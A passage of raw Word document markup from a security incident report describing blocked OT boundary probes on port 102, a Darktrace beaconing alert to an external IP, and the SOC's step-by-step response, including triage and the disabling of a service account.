              <w:t xml:space="preserve">Protocol       : TCP  |  Flags: SYN</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FF6B6B"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Action         : DENY  |  Bytes: 60</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FF6B6B"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Rule Name      : DENY-VLAN20-TO-OT-VLAN30</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="A8D8A8"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Threat Category: policy-violation</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="A8D8A8"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00E5FF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">--- OT Boundary Probe Attempt #2 ---</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FF6B6B"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Timestamp      : 2026-03-18T02:40:51.441Z</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FF6B6B"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Source IP      : 10.20.1.47</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FF6B6B"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Dest IP        : 10.30.0.1</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FF6B6B"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Dest Port      : 102  (S7 Comm — second attempt)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FF6B6B"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Action         : DENY  |  Bytes: 60</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="A8D8A8"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00E5FF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">--- OT Boundary Probe Attempt #3 ---</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FF6B6B"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Timestamp      : 2026-03-18T02:40:52.119Z</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FF6B6B"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Source IP      : 10.20.1.47</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FF6B6B"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Dest IP        : 10.30.0.2   (Siemens MES Gateway — secondary)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FF6B6B"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Dest Port      : 102</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FF6B6B"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Action         : DENY  |  Bytes: 60</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="A8D8A8"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FF6B6B"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">SENTINEL ALERT TRIGGERED: CORR-112 — OT Boundary Probe</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FF6B6B"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Claroty OT ICS Alert: Unusual network scan targeting OT assets</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FF6B6B"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">SOC Pager: P1 escalation at 02:41:07 UTC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2D2D"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">5.7 Screenshot 3 — Darktrace NDR: Anomalous Beaconing Model Breach</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2A" w:sz="1"/>
              <w:left w:val="single" w:color="1A3A2A" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A3A2A" w:sz="1"/>
              <w:right w:val="single" w:color="1A3A2A" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="1A3A2A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="180"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFE066"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">[ DARKTRACE ENTERPRISE  |  MODEL BREACH DETAIL  |  JLR-ENG-WS-047 ]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D2D2D" w:sz="1"/>
              <w:left w:val="single" w:color="2D2D2D" w:sz="1"/>
              <w:bottom w:val="single" w:color="2D2D2D" w:sz="1"/>
              <w:right w:val="single" w:color="2D2D2D" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="2D2D2D" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00E5FF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">FIELD</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="2D2D2D" w:sz="1"/>
              <w:left w:val="single" w:color="2D2D2D" w:sz="1"/>
              <w:bottom w:val="single" w:color="2D2D2D" w:sz="1"/>
              <w:right w:val="single" w:color="2D2D2D" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="2D2D2D" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00E5FF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">DETAIL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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Device</w:t>
            </w:r>
          </w:p>
        </w:tc>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JLR-ENG-WS-047  |  10.20.1.12  |  VLAN 20 R&amp;D</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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Breach ID</w:t>
            </w:r>
          </w:p>
        </w:tc>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FF6B6B"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">DT-20260318-00992</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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Model</w:t>
            </w:r>
          </w:p>
        </w:tc>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6B6B"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">Device / Unusual External Data Transfer + Periodic Beaconing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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Score</w:t>
            </w:r>
          </w:p>
        </w:tc>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FF6B6B"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">99.2 / 100  (CRITICAL — above 98 auto-escalates to Sentinel)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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Time</w:t>
            </w:r>
          </w:p>
        </w:tc>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2026-03-18T02:41:00Z — 06:55Z (active 3h 54m)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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Destination</w:t>
            </w:r>
          </w:p>
        </w:tc>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FF6B6B"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">185.234.219.47 (NL — known threat intel match: ET Pro blacklist)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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Beacon Interval</w:t>
            </w:r>
          </w:p>
        </w:tc>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6B6B"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">60.0s +/- 2.1s  (highly regular — automated beaconing signature)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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Data Volume</w:t>
            </w:r>
          </w:p>
        </w:tc>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OUT: 1.2 MB  |  IN: 847 KB  (low volume — command channel)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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Protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>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TLS 1.3 over TCP/443  (encrypted — content not inspectable)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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Peer Comparison</w:t>
            </w:r>
          </w:p>
        </w:tc>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FF6B6B"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">0 of 847 similar devices in peer group contact this destination</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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A8D8A8"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">Antigena Response</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="4B5563" w:sz="1"/>
              <w:left w:val="single" w:color="4B5563" w:sz="1"/>
              <w:bottom w:val="single" w:color="4B5563" w:sz="1"/>
              <w:right w:val="single" w:color="4B5563" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="1A1A1A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFA07A"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">BLOCKED — Darktrace Antigena blocked new connections to 185.234.219.47 after 12 beacons</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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A8D8A8"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">MITRE ATT&amp;CK</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="4B5563" w:sz="1"/>
              <w:left w:val="single" w:color="4B5563" w:sz="1"/>
              <w:bottom w:val="single" w:color="4B5563" w:sz="1"/>
              <w:right w:val="single" w:color="4B5563" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="2D2D2D" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFE066"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">T1071.001 Application Layer Protocol: Web  |  T1573 Encrypted Channel</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1A3A2A" w:sz="10" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="440"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A2A"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">6. Incident Response — Step-by-Step</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The JLR SOC executed the incident response process in accordance with the JLR Cyber Incident Response Plan (CIRP v3.2), which is aligned to NIST SP 800-61r2 (Computer Security Incident Handling Guide) and ISO/IEC 27035. The response is structured in four phases: Preparation (pre-incident), Detection &amp; Analysis, Containment / Eradication / Recovery, and Post-Incident Activity.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2D2D"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">6.1 Phase 1 — Preparation (Pre-Incident State)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The following controls were in place prior to the incident, enabling effective detection and response:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Sentinel analytics rules CORR-041, 055, 078, 091, 112 active and tuned against 90-day baselines.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CrowdStrike Falcon in monitoring mode on all VLAN 20 endpoints — alert-only, no auto-kill (to avoid disrupting R&amp;D workflows; a known risk-accepted configuration reviewed quarterly).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Darktrace Antigena enabled in autonomous response mode for confirmed C2 connections (model score &gt;95).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">JLR CIRP v3.2 distributed to all SOC staff; tabletop exercise completed 14 February 2026 — OT breach scenario rehearsed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Incident response retainer active with CrowdStrike Services for P1 forensic support.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Inter-VLAN firewall rule DENY-VLAN20-TO-OT-VLAN30 active (confirmed by audit 03 March 2026).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2D2D"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">6.2 Phase 2 — Detection and Analysis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2A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">STEP 1 — Initial Alert Triage (02:41–02:50 UTC)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Sentinel generated INC-JLR-2026-0312 at 02:41:07 UTC from correlation of 7 alerts across 4 rules.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Automated Sentinel playbook PB-001-P1-CRITICAL executed: (a) sent PagerDuty page to SOC L2 on-call analyst D. Okafor; (b) automatically disabled SVC-CAD-SYNC01 service account in Active Directory; (c) created ServiceNow P1 ticket SNW-20260318-04412.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SOC L2 analyst acknowledged alert at 02:43:22 UTC (2 minutes 15 seconds from alert generation).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Initial triage review of Sentinel incident detail identified 3 critical entity types: 2 internal hosts (JLR-ENG-WS-047, JLR-ENG-WS-012), 1 external IP (185.234.219.47), and 2 accounts (jthomas, SVC-CAD-SYNC01).</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r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">STEP 2 — Scope Assessment (02:50–03:15 UTC)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
